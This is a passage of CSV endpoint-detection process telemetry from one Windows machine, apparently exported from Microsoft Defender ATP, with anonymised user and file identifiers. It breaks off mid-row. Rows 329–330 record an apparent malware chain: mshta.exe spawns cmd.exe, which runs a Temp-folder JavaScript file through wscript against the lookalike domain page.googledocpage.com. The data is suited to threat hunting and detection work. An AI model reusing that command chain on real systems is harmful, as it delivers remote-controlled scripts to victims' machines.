+329,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:55.823447800+00:00,11896,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 1 ",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:55.669840400+00:00,13672,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 2",False,2021-06-24 10:59:46.807666+00:00,15476,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:55.962075900+00:00,2021-06-24 11:01:05.202999300+00:00,f3d54c66-012c-4a4b-a6cc-87bbc752acfe,computerpii_0a470890c60768167990033d701e7bd881398861,179573,False,10.7740.19041.1052,False,11540474045177916,,11540474045177918,2021-06-24 10:59:55.669840400+00:00,13672,2021-06-24 10:59:55.669840400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,13672,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 10:59:30.485947200+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+330,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:55.829163800+00:00,21248,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 2",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:55.669840400+00:00,13672,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_5b9316c3f180bcca68d5fb993680c5cd9240ffc5.js"" page.googledocpage.com/ 2",False,2021-06-24 10:59:46.807666+00:00,15476,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:55.962422100+00:00,2021-06-24 11:01:05.203047600+00:00,b07b9256-1285-45e9-8da5-153d92049d3a,computerpii_0a470890c60768167990033d701e7bd881398861,179574,False,10.7740.19041.1052,False,11540474045177916,,11540474045177919,2021-06-24 10:59:55.669840400+00:00,13672,2021-06-24 10:59:55.669840400+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,13672,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-24 10:59:30.485947200+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+331,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:59:56.383281900+00:00,8580,Teams.exe,"""Teams.exe"" --type=utility --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --no-sandbox --enable-wer --ms-teams-less-cors=522133263 --electron-shared-settings=eyJ********** --mojo-platform-channel-handle=4964 /prefetch:8",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:59:56.411754+00:00,2021-06-24 11:01:05.203427400+00:00,0d0f6d37-13ec-415f-b8cf-3cd0c7b0bd08,computerpii_0a470890c60768167990033d701e7bd881398861,179582,False,10.7740.19041.1052,False,11540474045177893,,11540474045177921,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+332,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:00:20.978157200+00:00,19164,WinStore.App.exe,"""WinStore.App.exe"" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca",PortableExecutable,2021-04-26 00:11:29.092373800+00:00,C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe,19968,57446e430eba7a8599b7033fe5645787,21933081c0e42748abb7054691ae798bb4c0afb08810e6ab1cab00215f5dffec,c95321b7cff2dfa12d28abbb09561070e6fe018e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:00:21.420514400+00:00,2021-06-24 11:01:05.204905700+00:00,5c8a0658-02f3-4a69-97f5-e0ffcd1b4685,computerpii_0a470890c60768167990033d701e7bd881398861,179612,False,10.7740.19041.1052,False,11540474045136908,,11540474045177929,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,465521635,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Windows Store,12104.1001.1.0,WinStore.App.exe,WinStore.App.exe,Store
+333,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:00:40.781715500+00:00,8540,backgroundTaskHost.exe,"""backgroundTaskHost.exe"" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca",PortableExecutable,2020-10-09 20:47:01.870262+00:00,C:\Windows\System32\backgroundTaskHost.exe,19776,da7063b17dbb8bbb3015351016868006,20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50,c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:00:40.934114700+00:00,2021-06-24 11:01:05.206670300+00:00,8b4f8831-9610-4c20-ac08-8df50d252eb0,computerpii_0a470890c60768167990033d701e7bd881398861,179646,False,10.7740.19041.1052,False,11540474045136908,,11540474045177938,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,465521635,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Background Task Host,backgroundTaskHost.exe,Background Task Host
+334,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:00:42.746733800+00:00,12680,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1656,6040383345057452175,9709952436734575156,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4316 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,977ded21e499b925709dddd1aea16b8d,bc64bfd597ef80d14b5c351de8b88f34a24e872a5c4035ddfaab37aab4fdce09,ac28608e80dd73783b61900d2118e7518c765baa,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:28.981045+00:00,10072,chrome.exe,"""chrome.exe"" ",False,2021-06-24 10:59:24.408006+00:00,7276,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:00:42.763437600+00:00,2021-06-24 11:01:05.206771800+00:00,b7d750c2-27db-4d47-91d0-175f51954901,computerpii_0a470890c60768167990033d701e7bd881398861,179648,False,10.7740.19041.1052,False,11540474045177854,,11540474045177943,2021-06-24 10:59:28.981045+00:00,10072,2021-06-24 10:59:28.981045+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,10072,16512,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-17 00:09:08+00:00,2021-06-17 01:34:32.216892+00:00,2021-06-24 10:59:29.111993500+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.114,chrome_exe,chrome.exe,Google Chrome
+335,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 08:22:36.254549900+00:00,11276,SDXHelper.exe,"""sdxhelper.exe""",PortableExecutable,2021-06-12 08:57:27.853849200+00:00,C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe,141160,a8252d1f5f159884fd66ccd77e36e0e6,eadbb47e3d669ea39db848ba066a0b3ba226cf41cc6c62b166dd74d29007d63d,06833da5eaf54d97e885088d0a8385bee2c1f017,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:22:36.289349300+00:00,2021-06-24 08:24:38.425297400+00:00,f0a8f16c-0058-4d58-b39f-46dd6da23ea3,computerpii_0a470890c60768167990033d701e7bd881398861,177605,False,10.7740.19041.1052,False,11540474045136925,,11540474045177331,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20738,SDXHELPER,SDXHELPER.EXE,Microsoft Office SDX Helper
+336,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 08:22:36.420917900+00:00,18240,SDXHelper.exe,"""SDXHelper.exe"" -Embedding",PortableExecutable,2021-06-12 08:57:27.853849200+00:00,C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe,141160,a8252d1f5f159884fd66ccd77e36e0e6,eadbb47e3d669ea39db848ba066a0b3ba226cf41cc6c62b166dd74d29007d63d,06833da5eaf54d97e885088d0a8385bee2c1f017,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:22:36.486802+00:00,2021-06-24 08:24:38.425812900+00:00,5ae3d84b-144e-40ad-8139-b0b43c394645,computerpii_0a470890c60768167990033d701e7bd881398861,177613,False,10.7740.19041.1052,False,11540474045136908,,11540474045177332,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20738,SDXHELPER,SDXHELPER.EXE,Microsoft Office SDX Helper
+337,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:58:52.372586100+00:00,18800,SenseCncProxy.exe,5088,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:58:53.353767+00:00,2021-06-25 00:59:56.528996200+00:00,66e30a06-1cfa-4d61-bb49-a8bddb09eea3,computerpii_0a470890c60768167990033d701e7bd881398861,182464,False,10.7740.19041.1052,False,11540474045137006,,11540474045178575,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+338,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:59:08.323296200+00:00,9696,ShellExperienceHost.exe,"""ShellExperienceHost.exe"" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca",PortableExecutable,2020-11-11 01:19:57.076114900+00:00,C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe,1657672,7d1c00d273af86287dee68c990a49cad,6cc44fbee63233a379e08b2fdf451890f6fce8615878c44bc1a680a6f13c9cbd,0d1a489714e4693c0cdfc8fc26be32e8d648eadd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:59:08.397309300+00:00,2021-06-25 00:59:56.530465300+00:00,0e5d6f61-5722-437b-8a89-52d136c9522b,computerpii_0a470890c60768167990033d701e7bd881398861,182482,False,10.7740.19041.1052,False,11540474045136908,,11540474045178577,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.610,ShellExperienceHost,ShellExperienceHost.exe,Windows Shell Experience Host
+339,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:59:08.726093800+00:00,5308,dllhost.exe,DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:59:08.771941800+00:00,2021-06-25 00:59:56.530762+00:00,9f20b0ca-3eb9-4192-a89d-31184b0fe92a,computerpii_0a470890c60768167990033d701e7bd881398861,182486,False,10.7740.19041.1052,False,11540474045136908,,11540474045178579,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 